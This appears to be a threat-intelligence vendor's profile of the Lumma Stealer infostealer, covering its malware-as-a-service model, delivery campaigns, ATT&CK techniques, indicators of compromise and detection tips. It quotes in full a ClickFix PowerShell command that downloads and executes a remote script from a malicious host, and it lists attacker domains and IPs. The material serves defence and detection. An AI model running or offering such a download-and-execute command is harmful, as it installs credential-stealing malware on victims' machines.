Lumma Stealer
Lumma Stealer, also referred to as Lumma and LummaC2, is a commercial malware-as-a-service infostealer that has been openly traded on Russian-speaking cybercrime forums since 2022. It is tracked by Microsoft as Storm-2477 and was described as one of the most prevalent infostealer services in 2025 until an international law-enforcement and industry disruption in May 2025. The malware is used by affiliates rather than a single threat actor group, with operators using a centralized web panel to generate builds and retrieve stolen logs.
Its core capability is theft of browser session cookies, saved logins, passwords, autofill data, cryptocurrency wallets, browser extensions, MFA-related data, and financial credentials. The content also states that Lumma logs have been widely sold on illicit forums, and that ransomware syndicates and other criminal actors have used Lumma to obtain initial access into corporate networks. Lumma has also been referenced as both a credential theft tool and a dropper for additional malware in Black Basta activity.
Observed delivery vectors include phishing emails disguised as hotel bookings or invoices, fake CAPTCHA and ClickFix social-engineering chains, malvertising, poisoned search ads for common software, cracked or pirated software, GitHub and cracked-software forum lures, and distribution by other malware loaders such as Amadey. Multiple campaigns described in the content relied on tricking users into opening the Windows Run dialog and executing clipboard-pasted PowerShell or mshta commands, which then downloaded and launched Lumma in the background. One campaign used compromised websites and EtherHiding infrastructure with payload components stored on Binance Smart Chain; another targeted visitors of Arabic pirated movie sites and used a legitimate Adobe-signed executable vulnerable to DLL sideloading, where a malicious sqlite.dll was identified as Lumma Stealer.
The malware has been associated in reporting with widespread criminal use and downstream ecosystem activity. Microsoft tracks Lumma’s core developer as Storm-2477. The content also states that Black Basta used LummaC2, that Amadey clusters frequently delivered Lumma payloads, and that Lumma was among leading observed infections in Mexico in 2025. INTERPOL reporting cited in the content also listed Lumma among top banking trojan and infostealer families in Asia and the South Pacific.
High-confidence indicators and technical details mentioned in the content include use of fake CAPTCHA chains with Win+R/Ctrl+V execution, PowerShell and mshta download cradles, Prometheus TDS redirection to binadata[.]com in a Canada-targeted campaign, retrieval of a JavaScript stage from 185.147.125[.]174, EtherHiding infrastructure referencing data-seed-prebsc-1-s1.bnbchain[.]org and check.foquh[.]icu, and a hard-coded anti-analysis failsafe that hashes the local username and computer name and exits if the values match 0x56CF7626 or 0xB09406C7. Additional campaign-specific IOCs tied to Lumma delivery in the content include accentypastedw[.]store, onefreex[.]com, rentry[.]co, 188.114.97[.]3, 104.26.3[.]16, 172.67.194[.]91, filehere0987[.]b-cdn[.]net, and SHA-1 bfc1422d1c5351561087bd3e6d82ffbad5221dae for a malicious sqlite.dll identified as Lumma Stealer.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2026-1731 BeyondTrust RS/PRA 9.8 Yes (GitHub) Yes (BT26-02) ... CVE-2026-1731 (BeyondTrust) is associated with HAFNIUM and linked to Lumma Stealer, SparkRAT, and VShell malware deployments.
Groups observed using it
31 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
And the most prolific tool for stealing it, until law enforcement hit it in 2025, was a piece of malware called Lumma. Lumma (also known as LummaC2) isn't a single cybercrime gang—it is a commercial product.
A recent campaign, active at least since December 2024, is promoting LummaStealer disguised as cracked software... Upon extraction the final payload is a LummaStealer executable.
Additional tradecraft and techniques: Usage of open-source tooling: ScreenConnect, FleetDeck, AnyDesk, RustDesk, Splashtop, Pulseway, TightVNC, LummaC2, Level.io, Mesh, TacticalRMM, Tailscale, Ngrok, WsTunnel, Rsocx, and Socat.
Groups like TA2727 use similar JavaScript injects and lures to distribute their own malware, including information stealers like Lumma and DeerStealer.
Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250.
We examined this payload and concluded that it is the Lumma Trojan stealer (Trojan-PSW.Win32.Lumma). The Lumma stealer gathers system and installed software information from the compromised devices, as well as sensitive data such as cookies, usernames, passwords, banking card numbers, and connection logs.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Initial Access
3 techniques
Initial Access
Those forums embed malicious JS into button clicks that redirect them to intermediate domains (.cfd, .click, .info, .xyz TLDs). These domains deliver the final download URL hosted on MEGA cloud storage...
Execution
6 techniques
Execution
Researchers discovered dozens of malicious wallpapers on Steam Workshop that abused Wallpaper Engine's Application Wallpaper feature to execute malware on users' PCs.
The PowerShell command that the user was asked to paste and run was: powershell.exe -W Hidden - command $url = '<https://filehere0987>[.]b-cdn[.]net/zuni[.]txt' ; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response .Content; iex $text | The rule below detects any PowerShell execution from the run dialog with suspicious commands, such as hidden executions -W Hidden , iex , or encoded commands -encodedCommand
Check the RunMRU Key: Check the registry Key under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU and review contents of possible malicious executed commands.
In one notable campaign, attackers injected JavaScript into compromised websites... This script then fetched the ClickFix lure and executed mshta via check.foquh[.]icu.
Persistence
2 techniques
Persistence
Privilege Escalation
1 technique
Privilege Escalation
Stealth
4 techniques
Stealth
This report covers infostealers disguised as illegal software such as cracks and keygens... Microsoft Corporation was the most frequently impersonated company, followed by Auslogics, NVIDIA Corporation, Virtual Holding Resources, LLC, and Adobe Inc.
Another distinct, Canada-targeted email cluster routed victims through the Prometheus TDS (Traffic Direction System) to binadata[.]com.
Credential Access
4 techniques
Credential Access
When successfully deployed and executed, information-stealing malware can harvest credentials (usernames, passwords, and session cookies) from infected environments and export them as logs to the attackers’ server.
The wristband is called a session cookie. And the most prolific tool for stealing it, until law enforcement hit it in 2025, was a piece of malware called Lumma... Once an attacker extracts your session cookie, they can import it directly into their own web browser and seamlessly become you.
Discovery
1 technique
Discovery
Collection
3 techniques
Collection
Banking trojans and information stealers materialized as the second most prevalent type of cybercrime, with malware families like RedLine, Lumma, LokiBot, Negasteal, and ZBot taking up the top spots.
Command and Control
3 techniques
Command and Control
This script performed three main actions: Downloaded a ZIP file and extracted it into the AppData directory.
IOCs tracked for this family
1,064 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An infostealer sold under a malware-as-a-service model that steals browser session cookies, saved logins, passwords, autofill data, cryptocurrency wallets, MFA-related data, and financial credentials, enabling account takeover by reusing authenticated sessions.
Information-stealing malware that was among the leading observed infections in Mexico in 2025.
Lumma Stealer is mentioned as a payload distributed by a large botnet cluster within the Amadey ecosystem.
Named as an infostealer family in the broader infostealer ecosystem and also described as downstream malware delivered by Amadey.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.